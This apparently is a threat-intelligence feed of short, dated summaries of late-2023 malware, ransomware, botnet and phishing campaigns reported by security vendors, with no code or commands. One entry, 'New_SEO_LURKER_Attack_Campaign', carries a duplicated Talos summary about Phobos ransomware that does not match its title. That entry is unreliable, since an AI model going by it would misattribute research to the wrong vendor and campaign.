- Researchers at Perception Point recently uncovered a sophisticated malware attack leveraging a multi-layered fake invoice campaign. The threat actor, impersonating a financial services company, prompts users to click on a seemingly legitimate invoice link as an evasion tactic. The attacker exploits a breached website to redirect users, initiating the download of a JavaScript file containing the LUMMA InfoStealer malware. LUMMA, distributed through Malware-as-a-Service, executes complex processes from unusual locations, adding layers of obfuscation to the attack.
Source:
https://perception-point.io/blog/behind-the-attack-lumma-malware/
—
- Intel Source:
- CADO Security
- Intel Name:
- P2PInfect
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- Cado analysts have been monitoring the development of a cross-platform botnet “P2Pinfect”. As the name suggests, the malware – written in Rust – acts as a botnet agent, connecting infected hosts in a peer-to-peer topology.
Source:
https://www.cadosecurity.com/p2pinfect-new-variant-targets-mips-devices/
—
- Intel Source:
- Bolster
- Intel Name:
- Vast_Parcel_Delivery_Phishing_Campaign
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- Bolster’s researchers have discovered a new scam tactic: a domain impersonating Walmart, precisely designed to mimic the appearance of the USPS.com website.
—
- Intel Source:
- STR
- Intel Name:
- Threat_Actors_Target_MSSQL_Servers
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- In an interesting attack campaign, the Securonix Threat Research team has identified threat actors targeting exposed Microsoft SQL (MSSQL) services using brute force attacks. One of the things that makes DB#JAMMER stand out is how the attacker’s tooling infrastructure and payloads are used. The ransomware payload of choice appears to be a newer variant of Mimic ransomware called FreeWorld.
—
- Intel Source:
- Cybereason
- Intel Name:
- Compromise_of_SEO_Poisoning_and_Large_Payloads_by_GootLoader_threat
- Date of Scan:
- 2023-12-05
- Impact:
- MEDIUM
- Summary:
- The Cybereason IR team captured different attack scenarios that started from a GootLoader infection and ultimately deployed further capabilities. The team observed large payloads (40 MB and more) masquerading as legitimate JavaScript code to evade security mechanisms, fast-moving behavior, and post-infection frameworks being deployed, namely Cobalt Strike and SystemBC, the latter usually leveraged for data exfiltration. SEO poisoning techniques were used to spread the malware.
—
- Intel Source:
- Blackberry
- Intel Name:
- New_Cyber_Espionage_Threat_Targets_US_Aerospace_Industry
- Date of Scan:
- 2023-12-05
- Impact:
- LOW
- Summary:
- BlackBerry’s Threat Research team has uncovered a sophisticated cyber-espionage campaign, naming the threat actor AeroBlade, targeting a U.S. aerospace organization. Initiated through spear-phishing, the attacker evolved their tactics from a testing phase in September 2022 to a more advanced stage in July 2023. The attacker’s goal, assessed with medium to high confidence, is commercial cyber espionage.
Source:
https://blogs.blackberry.com/en/2023/11/aeroblade-on-the-hunt-targeting-us-aerospace-industry
—
- Intel Source:
- thedfirreport
- Intel Name:
- BlueSky_Ransomware_Emerges
- Date of Scan:
- 2023-12-04
- Impact:
- LOW
- Summary:
- In December, a notable intrusion occurred, targeting public-facing MSSQL servers and resulting in the deployment of BlueSky ransomware. This report unveils the threat actors’ techniques, starting with an MSSQL brute force attack on the “sa” account. Leveraging Cobalt Strike and Tor2Mine, the attackers executed post-exploitation activities. Within an hour, BlueSky ransomware spread network-wide. The report provides a comprehensive breakdown, including threat actor profiles, initial access details, execution events, persistence methods, privilege escalation tactics, and the impact of the ransomware.
Source:
https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- South_Korea_and_Uzbekistan_are_Targeted_by_SugarGh0st_RAT
- Date of Scan:
- 2023-12-01
- Impact:
- LOW
- Summary:
- Cisco Talos researchers have identified a new RAT, “SugarGh0st,” in a malicious campaign. They assess with high confidence that the SugarGh0st RAT is a new customized variant of Gh0st RAT, an infamous trojan that has been active for more than a decade, with customized commands to facilitate the remote administration tasks directed by the C2. They observed two infection chains leveraging Windows Shortcut files embedded with malicious JavaScript to deliver the components that drop and launch the SugarGh0st payload.
Source:
https://blog.talosintelligence.com/new-sugargh0st-rat/
—
- Intel Source:
- Infoblox
- Intel Name:
- Early_Detection_of_ROMCOM_malicious_DNS
- Date of Scan:
- 2023-12-01
- Impact:
- LOW
- Summary:
- This article discusses the malicious domain ROMCOM and the threat actor group Void Rabisu, and how Infoblox’s DNS Early Detection Program identified multiple ROMCOM malicious domains as suspicious an average of 91.6 days before they were identified as malicious in OSINT. It also explains how ROMCOMLITE, a new variation of the malware, is being used to target organizations in Ukraine and various NATO countries, and how Infoblox’s suspicious domain data can help customers reduce risk and increase the return on investment for their threat intelligence program.
Source:
https://blogs.infoblox.com/cyber-threat-intelligence/dns-early-detection-romcom/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Fake_Virus_Alerts
- Date of Scan:
- 2023-12-01
- Impact:
- LOW
- Summary:
- ScamClub has been running a malvertising campaign since 2018, redirecting mobile users on high profile websites to a fake security alert connected to a malicious McAfee affiliate. The malicious JavaScripts were hosted on Google’s cloud but have since moved to Azure’s CDN. Malwarebytes for Android can protect users from this campaign. Indicators of compromise are provided.
—
- Intel Source:
- Arctic Wolf
- Intel Name:
- Cactus_Ransomware_Campaign_Exploiting_Vulnerabilities_in_Qlik_Sense
- Date of Scan:
- 2023-12-01
- Impact:
- MEDIUM
- Summary:
- Researchers from Arctic Wolf Labs have observed a new Cactus ransomware campaign exploiting publicly exposed installations of Qlik Sense. This campaign marks the first documented instance Arctic Wolf is aware of in which threat actors deploying Cactus ransomware exploited vulnerabilities in Qlik Sense for initial access.
Source:
https://www.arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Attacks_against_organizations_in_the_Middle_East_and_Africa
- Date of Scan:
- 2023-12-01
- Impact:
- LOW
- Summary:
- Unit 42 researchers identified a tool set used by a threat actor against organizations in the Middle East, Africa and the US, including the Agent Racoon malware, Ntospy, and a customized version of Mimikatz. The tool set was used to exfiltrate confidential information, such as emails and Roaming Profiles, and was mapped to the MITRE ATT&CK matrix.
Source:
https://unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa/
—
- Intel Source:
- Cyble
- Intel Name:
- Uncovering_the_new_Java_Based_SAW_RAT
- Date of Scan:
- 2023-12-01
- Impact:
- LOW
- Summary:
- This article provides an analysis of the Saw RAT, a Java-based RAT embedded in a ZIP archive file. It outlines the infiltration strategy, which involves a maliciously crafted ZIP archive containing a PDF icon shortcut, a JavaScript file, a deceptive PDF file, and a malicious JAR file. The malware establishes a connection with a C&C server and carries out various functions in response to commands. Recommendations for best practices to protect against such attacks are also provided.
Source:
https://cyble.com/blog/uncovering-the-new-java-based-saw-rats-infiltration-strategy-via-lnk-files/
—
- Intel Source:
- Huntress
- Intel Name:
- Observed_the_use_of_Finger_a_client_server_application
- Date of Scan:
- 2023-11-30
- Impact:
- LOW
- Summary:
- Huntress analysts observed the use of Finger, a client-server application, to exfiltrate data from an endpoint. The threat actor created a webshell on an MSExchange server and used Finger to download a file and gain situational awareness. In September 2020, an advisory was published by security researcher John Page. MITRE ATT&CK mappings and a statistic from Huntress’ SMB Threat Report are also provided.
Source:
https://www.huntress.com/blog/cant-touch-this-data-exfiltration-via-finger
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_Distributing_Using_Sale_of_Personal_Information_as_Bait
- Date of Scan:
- 2023-11-30
- Impact:
- LOW
- Summary:
- Researchers from ASEC have uncovered a case of malware distribution that used the sale of personal data as a lure. This attack relies on social engineering.
—
- Intel Source:
- ASEC
- Intel Name:
- South_Korean_Research_Institutes_Targeted_by_Kimsuky
- Date of Scan:
- 2023-11-30
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the Kimsuky threat group is sending malicious JSE files disguised as an import declaration to South Korean research institutes. Ultimately, the threat actor uses a backdoor to execute commands and steal data.
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_release_of_new_malware_Nova_infostealer
- Date of Scan:
- 2023-11-30
- Impact:
- LOW
- Summary:
- MaaS operator Sordeal has developed the Nova infostealer, a sophisticated malware with alarming capabilities such as credential harvesting, Discord injection, and targeting crypto wallets. Organizations must enhance their threat detection and fortify defenses to mitigate the risks posed by Nova. Strategic, tactical, and management recommendations are provided to help protect against the malware.
Source:
https://www.cyfirma.com/outofband/emerging-maas-operator-sordeal-releases-nova-infostealer/
—
- Intel Source:
- Censys
- Intel Name:
- Tracking_Vidar_malware_infrastructure
- Date of Scan:
- 2023-11-29
- Impact:
- LOW
- Summary:
- A Censys security researcher shared details about one of the more advanced stealers, Vidar. Vidar is a piece of malware derived from the Arkei Stealer that uses new methods to locate and direct traffic to the attacker.
—
- Intel Source:
- Russian Panda
- Intel Name:
- MetaStealer_analysis
- Date of Scan:
- 2023-11-29
- Impact:
- LOW
- Summary:
- Russian Panda researchers provided a technical analysis and overview of some of MetaStealer’s functionality. It has many similarities with Redline Stealer.
Source:
https://russianpanda.com/2023/11/20/MetaStealer-Redline%27s-Doppelganger/
—
- Intel Source:
- cybereason
- Intel Name:
- Delivering_DJvu_Variant_while_Posing_as_Freeware_via_Loader
- Date of Scan:
- 2023-11-29
- Impact:
- MEDIUM
- Summary:
- Researchers from Cybereason have seen DJvu variants distributed through loaders posing as freeware. They present an overview of these threats and offer practical recommendations for defending against them.
Source:
https://www.cybereason.com/hubfs/dam/collateral/reports/threat-alert-DJvu-variant.pdf
—
- Intel Source:
- Fortinet
- Intel Name:
- GoTitan_Botnet_Exploiting_Apache_ActiveMQ_Vulnerability
- Date of Scan:
- 2023-11-29
- Impact:
- LOW
- Summary:
- Threat actors are aggressively exploiting the recently disclosed severe security vulnerability affecting Apache ActiveMQ to spread a new Go-based botnet named GoTitan and a .NET application called PrCtrl Rat, which can remotely take over compromised servers.
Source:
https://www.fortinet.com/blog/threat-research/gotitan-botnet-exploitation-on-apache-activemq
—
- Intel Source:
- Weixin
- Intel Name:
- The_delivery_of_the_Remcos_Trojan
- Date of Scan:
- 2023-11-29
- Impact:
- LOW
- Summary:
- The QiAnXin Threat Intelligence Center observed that Spyder has undergone at least two rounds of updates since July, and found that attackers used Spyder to implant the Remcos Trojan into the target host. The Spyder malware is associated with the Maharashtra organization, and its main function is to download and run executable files issued by the C2 server.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Persian_Remote_World_malicious_activity
- Date of Scan:
- 2023-11-28
- Impact:
- LOW
- Summary:
- Cyble research center identified a website selling malicious tools, including RATs, loaders, and crypters, which can enable unauthorized control, identity theft, financial fraud, and system modifications. Recommendations to protect against these tools are provided, as well as MITRE ATT&CK® Techniques and Indicators of Compromise (IOCs).
Source:
https://cyble.com/blog/new-persian-remote-world-selling-a-suite-of-malicious-tools/
—
- Intel Source:
- Any.run
- Intel Name:
- Diving_Deep_into_RisePro_Malware
- Date of Scan:
- 2023-11-28
- Impact:
- LOW
- Summary:
- AnyRun researchers have examined the RisePro malware. This information stealer was initially discovered by the cybersecurity companies Sekoia and Flashpoint. It is disseminated via fake crack websites run by the pay-per-install (PPI) malware distribution operation PrivateLoader. Its goal is to steal cryptocurrency wallets, passwords, and credit card data from compromised machines.
Source:
https://any.run/cybersecurity-blog/risepro-malware-communication-analysis/
—
- Intel Source:
- Malware Traffic Analysis
- Intel Name:
- AgentTesla_infection_with_FTP_data_exfil
- Date of Scan:
- 2023-11-28
- Impact:
- LOW
- Summary:
- This article provides an overview of an AgentTesla infection with FTP data exfiltration that occurred on 2023-11-22. It includes associated files, malware/artifacts, email headers, and infection chain. Malware/artifacts include a RAR archive, VBS file, script, PNG image, DLL, reversed base64 text, and AgentTesla EXE. Infection traffic is also listed, including IP addresses and ports used.
Source:
https://www.malware-traffic-analysis.net/2023/11/22/index.html
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_2_state_sponcored_North_Korean_campaigns_targeting_job_seekers
- Date of Scan:
- 2023-11-28
- Impact:
- MEDIUM
- Summary:
- The team at Palo Alto Networks Unit 42 released research on North Korean activity leveraging remote work in two distinct campaigns they call Contagious Interview and Wagemole. Both campaigns have the goals of espionage and cryptocurrency theft.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Insight_into_groups_operating_Telekopye_bots
- Date of Scan:
- 2023-11-28
- Impact:
- LOW
- Summary:
- Welivesecurity published their article about Telekopye, a Telegram bot that helps cybercriminals scam people in online marketplaces. Telekopye can craft phishing websites, emails, SMS messages, and more.
Source:
https://www.welivesecurity.com/en/eset-research/telekopye-hunting-mammoths-using-telegram-bot/
—
- Intel Source:
- Virustotal Blog
- Intel Name:
- Actionable_day_in_a_Threat_Hunters_life_report
- Date of Scan:
- 2023-11-28
- Impact:
- LOW
- Summary:
- This article explains how to use VirusTotal Intelligence (VTI) to hunt and monitor malicious activity, using third-party intelligence reports. It provides examples of how to use VTI to search for samples with similar behaviors, and how to convert VTI queries into YARA rules for use in VirusTotal Livehunt.
Source:
https://blog.virustotal.com/2023/11/actionable-threat-intel-vi-day-in.html
—
- Intel Source:
- ASEC
- Intel Name:
- Exploiting_an_Apache_ActiveMQ_Vulnerability_CVE_2023_46604
- Date of Scan:
- 2023-11-27
- Impact:
- MEDIUM
- Summary:
- The Andariel threat group has been targeting South Korean companies and institutions with spear phishing, watering hole, and supply chain attacks. Recently, they have been exploiting a Log4Shell vulnerability, targeting MS-SQL servers, and abusing legitimate software. AhnLab Security Emergency Response Center (ASEC) discovered the group exploiting a remote code execution vulnerability (CVE-2023-46604) in Apache ActiveMQ servers to install malware, including NukeSped, HelloKitty ransomware, Metasploit Meterpreter’s Stager, and CobaltStrike Beacon. The article provides hashes, C&C servers, and URLs associated with the malicious files.
—
- Intel Source:
- NIS
- Intel Name:
- Hackers_Utilize_Supply_Chain_Attacks_With_Zero_Day_Vulnerabilities
- Date of Scan:
- 2023-11-27
- Impact:
- MEDIUM
- Summary:
- The National Intelligence Service (NIS) of Korea and the National Cyber Security Centre (NCSC) have issued a warning over the North Korean Lazarus hacker group’s use of a zero-day vulnerability in the MagicLine4NX software to perform supply-chain assaults against businesses.
Source:
https://www.documentcloud.org/documents/24174869-rok-uk-joint-cyber-security-advisoryeng
—
- Intel Source:
- Esentire
- Intel Name:
- Parallax_RAT_infection
- Date of Scan:
- 2023-11-27
- Impact:
- LOW
- Summary:
- Parallax RAT is a malware discovered by eSentire’s TRU. It is delivered to machines, has capabilities to evade detection, and can be used to compromise endpoints. Recommendations are provided to protect against it, as well as indicators of compromise.
Source:
https://www.esentire.com/blog/unveiling-parallax-rat-a-journey-from-infection-to-lateral-movement
—
- Intel Source:
- SentinelOne
- Intel Name:
- DPRK_Crypto_Theft
- Date of Scan:
- 2023-11-27
- Impact:
- MEDIUM
- Summary:
- This article discusses two North Korean-aligned macOS campaigns in 2023: RustBucket and KandyKorn. RustBucket used a Swift-based application bundle and KandyKorn used a five-stage attack with social engineering via Discord. KandyKorn is distributed as Cross-Platform Bridges.zip and contains multiple benign Python scripts. SentinelOne Singularity detects and protects against all known components of KandyKorn and RustBucket malware.
—
- Intel Source:
- Qualys
- Intel Name:
- Phobos_Ransomware_Masquerading_As_VX_Underground
- Date of Scan:
- 2023-11-27
- Impact:
- LOW
- Summary:
- Phobos ransomware is malicious software masquerading as VX-Underground, distributed via stolen RDP connections. It halts execution if a Cyrillic alphabet is present, kills processes, deletes shadow copies, and encrypts files with a “.VXUG” extension. Qualys Threat Research is monitoring the attack and providing hunting queries for detection.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Taking_Edge_Off_Systemjoker_in_Israel_Hamas_War_Spotlight
- Date of Scan:
- 2023-11-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Check Point have traced the development of SysJoker, a previously unidentified multi-platform backdoor that was used by an APT with ties to Hamas to target Israel.
Source:
https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Distributing_Atomic_Stealers_via_Fake_Browser_Updates
- Date of Scan:
- 2023-11-24
- Impact:
- LOW
- Summary:
- Researchers at Malwarebytes have discovered that AMOS is being distributed to Mac users through a fake browser update chain known as “ClearFake.” This may be the first time that one of the most popular social engineering campaigns, previously exclusive to Windows, has branched out into other operating systems as well as other geolocations.
—
- Intel Source:
- Fortinet
- Intel Name:
- Konni_Campaign_Spreading_Through_a_Malicious_File
- Date of Scan:
- 2023-11-24
- Impact:
- LOW
- Summary:
- A Russian-language Word document containing a malicious macro is being used in the ongoing Konni campaign, according to FortiGuard Labs. Internal telemetry shows continued engagement with the campaign’s C2 server even though the document was created in September.
Source:
https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document
—
- Intel Source:
- SOC Radar
- Intel Name:
- An_Overview_of_Volt_Typhoon
- Date of Scan:
- 2023-11-24
- Impact:
- LOW
- Summary:
- Volt Typhoon, also known as BRONZE SILHOUETTE, is an advanced, state-sponsored Advanced Persistent Threat (APT) organization that is mostly thought to have originated in China. Their online activities have been meticulously observed and recorded over the last few years by numerous cybersecurity companies, international intelligence agencies, and governmental organizations.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Misuse_of_MQTT_Messaging_Protocol_by_Stealthy_WailingCrab_Malware
- Date of Scan:
- 2023-11-24
- Impact:
- LOW
- Summary:
- Researchers from IBM X-Force have been monitoring changes made to the WailingCrab malware family. They have focused on changes that affect the virus’s C2 communication techniques, which involve abusing the MQTT Internet-of-Things (IoT) messaging protocol.
Source:
https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
—
- Intel Source:
- Akamai
- Intel Name:
- Mirai_Based_Botnet_Explores_Two_Zero_Days
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- Researchers from Akamai have uncovered a brand-new DDoS botnet, called InfectedSlurs, that targets routers and network video recorders (NVRs) by actively taking advantage of two zero-day vulnerabilities.
Source:
https://www.akamai.com/blog/security-research/new-rce-botnet-spreads-mirai-via-zero-days
—
- Intel Source:
- Trend Micro
- Intel Name:
- Malicious_Chrome_Extensions_Targeting_Brazil
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro have described the modular architecture of malicious Chrome extensions, which are made up of a number of highly obfuscated parts that use the Google Chrome API to monitor, intercept, and steal victim data.
—
- Intel Source:
- Microsoft
- Intel Name:
- Modified_CyberLink_Installer_Distributing_by_Diamond_Sleet
- Date of Scan:
- 2023-11-23
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have discovered a supply chain attack using a malicious version of an application created by CyberLink Corp. that was carried out by the North Korea-based threat actor Diamond Sleet (ZINC). This malicious file is actually an installer for a CyberLink application, but it has been altered to contain malicious code that downloads, decrypts, and loads a second-stage payload.
—
- Intel Source:
- ReliaQuest
- Intel Name:
- Scattered_Spider_Attack_Analysis
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- ReliaQuest recently observed an intrusion into a customer’s internal IT documentation, and a lateral move from the customer’s identity-as-a-service (IDaaS) provider to their on-premises assets in a matter of minutes. The attack was attributed to the highly capable “Scattered Spider” cybercrime group. Scattered Spider, an “ALPHV”/“BlackCat” ransomware affiliate, infiltrates cloud and on-premises environments via social engineering.
Source:
https://www.reliaquest.com/blog/scattered-spider-attack-analysis-account-compromise/
—
- Intel Source:
- Securelist
- Intel Name:
- HrServ_web_shell_analysis
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- Securelist obtained a DLL file, identified as hrserv.dll, which turned out to be a previously unknown web shell exhibiting sophisticated features such as custom encoding methods for client communication and in-memory execution.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Possible_Return_of_Genesis_Market_malicious_operations
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- The Trend Micro Managed XDR team observed malicious campaigns that were very similar to the ones used by Genesis Market. The threat actor used Node.js as a platform for the backdoor, Extended Validation (EV) Code Signing for defense evasion, and possibly Google Colab to host search engine-optimized download sites. The Trend Micro researchers provided in their blog a technical analysis of these attacks, including confirmed findings and speculation about the other techniques used by the threat actor behind these activities.
Source:
https://www.trendmicro.com/en_us/research/23/k/attack-signals-possible-return-of-genesis-market.html
—
- Intel Source:
- Malware news
- Intel Name:
- The_distribution_of_Atomic_Stealer_to_Mac_users
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- Atomic Stealer, aka AMOS, is a known stealer for macOS. Recently a new development was observed: AMOS is now being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’. It is the first time this major social engineering campaign, previously reserved for Windows, has been observed targeting Mac users. The threat actors could widen their possibilities by stealing credentials and files of interest that can be monetized immediately or repurposed for additional attacks.
Source:
https://malware.news/t/atomic-stealer-distributed-to-mac-users-via-fake-browser-updates/75907
—
- Intel Source:
- NCC Group
- Intel Name:
- Analysis_of_NoEscape_Ransomware_Group
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- NoEscape seems to focus on weak external services; initial access was gained by exploiting a Microsoft Exchange server within the victim’s network that was exposed to the public. Webshells were placed on the server as a result of exploitation, which also provided the threat actor with an early foothold in the environment.
—
- Intel Source:
- VMware
- Intel Name:
- NetSupport_RAT
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- Threat analysts from Carbon Black and VMware observed more than 15 new infections linked to NetSupport RAT in the last couple of weeks. Most of them were in the Education, Government, and Business Services sectors. VMware analysts described their methods of detecting and preventing this malware in their report, along with providing valuable insights and resources for defenders. In these latest attacks, the NetSupport RAT has been observed being downloaded onto a victim’s computer via deceptive websites and fake browser updates. The initial infection vector, however, can vary depending on the threat actors.
Source:
https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- A_Comparative_Analysis_of_Ransomware_Attacks_on_Windows_and_Linux
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- Check Point Researchers have published an analysis of a number of the most recent ransomware attacks targeting Linux and ESXi systems, which have been increasingly targeted in recent years. Although the variants targeting Linux are still comparatively rudimentary, comparable ransomware threats have long been known in Windows environments.
—
- Intel Source:
- Seebug
- Intel Name:
- Examination_of_Confluence_Server_Ransomware_Attack_with_C3RB3R
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- According to a security team, vulnerabilities in the Atlassian Confluence Data Center and Server software have been found recently. Attackers have repeatedly used this vulnerability to target Linux and Windows systems with fresh variants of the C3RB3R (Cerber) ransomware.
Source:
https://paper.seebug.org/3076/
—
- Intel Source:
- Palo Alto
- Intel Name:
- A_North_Korean_Group_is_Behind_Two_Job_Related_Campaigns
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- Researchers from Unit 42 have uncovered two distinct campaigns that target job-seeking activities connected to threat actors with state sponsorship that are connected to the Democratic People’s Republic of Korea (DPRK), also referred to as North Korea.
Source:
https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/
—
- Intel Source:
- Any.Run
- Intel Name:
- XWorm_Malware_campaign
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- An analyst from Tweater shared on the Any.Run blog his exploration of the dynamics that occur when a successful connection is established between the XWorm operating server and a user who has fallen victim to executing this malware.
Source:
https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_Malicious_LNK_File
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- Recently, ASEC has observed a malicious LNK file being distributed to financial and blockchain corporation personnel through email and other ways.
—
- Intel Source:
- Trellix
- Intel Name:
- The_DarkGate_Malware_as_a_Service_continuation
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- The Trellix researchers analyzed DarkGate malware versions 4.6, 4.10.2, 4.17b, and the latest 5.0.19, mapping the rapid evolution of the malware. DarkGate is a complete toolkit that provides attackers with extensive capabilities to fully compromise victim systems.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Java_Based_Rude_Stealer
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- Cyble researchers observed a new stealer named “Rude”. This Java-based malware is specifically designed to discreetly pilfer confidential data from compromised machines.
Source:
https://cyble.com/blog/new-java-based-rude-stealer-abuses-directx-diagnostic-tool/
—
- Intel Source:
- CISA
- Intel Name:
- LockBit_3_0_ransomware_exploiting_CVE_2023_4966
- Date of Scan:
- 2023-11-21
- Impact:
- MEDIUM
- Summary:
- CISA, FBI, MS-ISAC, and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_SEO_LURKER_Attack_Campaign
- Date of Scan:
- 2023-11-21
- Impact:
- MEDIUM
- Summary:
- Cisco Talos recently identified the most creative Phobos variants, common affiliate tactics, techniques and procedures (TTPs), and characteristics of the Phobos affiliate structure, based on observed Phobos activity and analysis of over 1,000 Phobos samples dating back some time. Talos analysts are convinced that Eking, Eight, Elbie, Devos and Faust are the most common Phobos variants, as they appeared most frequently across the samples Talos analyzed.
—
- Intel Source:
- cybereason
- Intel Name:
- INC_Ransom_Group_Targets_Western_Organizations_with_Double_Extortion
- Date of Scan:
- 2023-11-21
- Impact:
- LOW
- Summary:
- Cybereason issued a Threat Alert regarding a new ransomware group, INC Ransom, that surfaced in August 2023. Operating primarily in the United States and Europe, the group employs a double and triple extortion strategy, leaking data on a dedicated blog and exerting pressure on victims to pay the ransom. INC Ransom’s victims consist mainly of private sector businesses, with notable incidents involving a government organization and a charity association. The group’s modus operandi involves using compromised credentials for lateral movement, deploying ransomware through WMIC and PSEXEC, and employing tools like MegaSync for data exfiltration.
Source:
https://www.cybereason.com/blog/threat-alert-inc-ransomware
—
- Intel Source:
- Kilguard, ASEC
- Intel Name:
- Ddostf_Botnet_Resurfaces_in_DDoS_Attacks
- Date of Scan:
- 2023-11-21
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have shared their concerns about a new campaign targeting MySQL servers and Docker hosts with DDoS malware. Researchers state that this malware is meant to launch DDoS attacks and that the threat actor is operating a DDoS-for-hire service.
Source:
https://kilguard.net/ddostf-botnet-resurfaces-in-ddos-attacks-against-mysql-and-docker-hosts/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Stately_Taurus_campaigns
- Date of Scan:
- 2023-11-21
- Impact:
- LOW
- Summary:
- Unit 42 researchers discovered three Stately Taurus attacks during the month of August. These attacks targeted entities in the South Pacific, including the Philippines government. The campaigns manipulated legitimate software including Solid PDF Creator and SmadavProtect (an Indonesian-based antivirus solution) to sideload malicious files. Stately Taurus (aka Mustang Panda, Bronze President, Red Delta, Luminous Moth, Earth Preta and Camaro Dragon) has been operating since at least 2012. It is assessed to be a Chinese advanced persistent threat (APT) group that routinely conducts cyberespionage campaigns.
Source:
https://unit42.paloaltonetworks.com/stately-taurus-targets-philippines-government-cyberespionage/
—
- Intel Source:
- Ciberdefensa
- Intel Name:
- Malicious_LNK_File_Campaign_Targeting_Financial_and_Blockchain_Corporations
- Date of Scan:
- 2023-11-21
- Impact:
- MEDIUM
- Summary:
- A recent security alert from AhnLab Security Emergency Response Center (ASEC) reveals a sophisticated campaign distributing malicious LNK files to personnel within financial and blockchain corporations. The malicious files, disguised as legitimate documents, deceive users during the opening process. The LNK files execute obfuscated PowerShell commands, leading to the creation of additional files and potential compromise of systems.
—
- Intel Source:
- ISC. SANS
- Intel Name:
- Quasar_RAT_Delivery
- Date of Scan:
- 2023-11-21
- Impact:
- LOW
- Summary:
- Researchers from SANS observed an old Quasar RAT payload delivered through an updated SharpLoader. Its purpose is to load and decompress a C# payload from a remote web server or a local file and execute it.
—
- Intel Source:
- ASEC
- Intel Name:
- The_Andariel_group_distributing_malware
- Date of Scan:
- 2023-11-21
- Impact:
- LOW
- Summary:
- The ASEC analysts observed the Andariel group spreading malware via an attack using a certain asset management program. The Andariel group is known to be a sub-organization of the Lazarus group.
—
- Intel Source:
- Uptycs
- Intel Name:
- WinRAR_0_day_CVE_2023_38831_Vulnerability
- Date of Scan:
- 2023-11-21
- Impact:
- MEDIUM
- Summary:
- Recently, it has been discovered that the WinRAR vulnerability tracked as CVE-2023-38831 concerns its handling of file extensions, giving opportunities for unauthorized code execution. The Uptycs Threat Research Team has outlined the WinRAR vulnerability in a previous blog, detailing its exploitation and providing technical insights.
Source:
https://www.uptycs.com/blog/cve-2023-38831-winrar-zero-day
—
- Intel Source:
- Outpost24
- Intel Name:
- A_new_Anti_Sandbox_technique_LummaC2_4_0_stealer
- Date of Scan:
- 2023-11-21
- Impact:
- LOW
- Summary:
- Outpost24 threat researchers took a deep dive into a new anti-sandbox technique that the LummaC2 v4.0 stealer uses to avoid detonation when no human mouse activity is detected.
Source:
https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/
—
- Intel Source:
- Talos
- Intel Name:
- The_most_prolific_Phobos_variants_lately
- Date of Scan:
- 2023-11-20
- Impact:
- LOW
- Summary:
- Cisco Talos recently identified the most creative Phobos variants, common affiliate tactics, techniques and procedures (TTPs), and characteristics of the Phobos affiliate structure, based on observed Phobos activity and analysis of over 1,000 Phobos samples dating back some time. Talos analysts are convinced that Eking, Eight, Elbie, Devos and Faust are the most common Phobos variants, as they appeared most frequently across the samples Talos analyzed.
Source:
https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/
—
- Intel Source:
- ASEC
- Intel Name:
- An_Apache_Web_Server_Cryptojacking_Attack_Using_Cobalt_Strike
- Date of Scan:
- 2023-11-20
- Impact:
- LOW
- Summary:
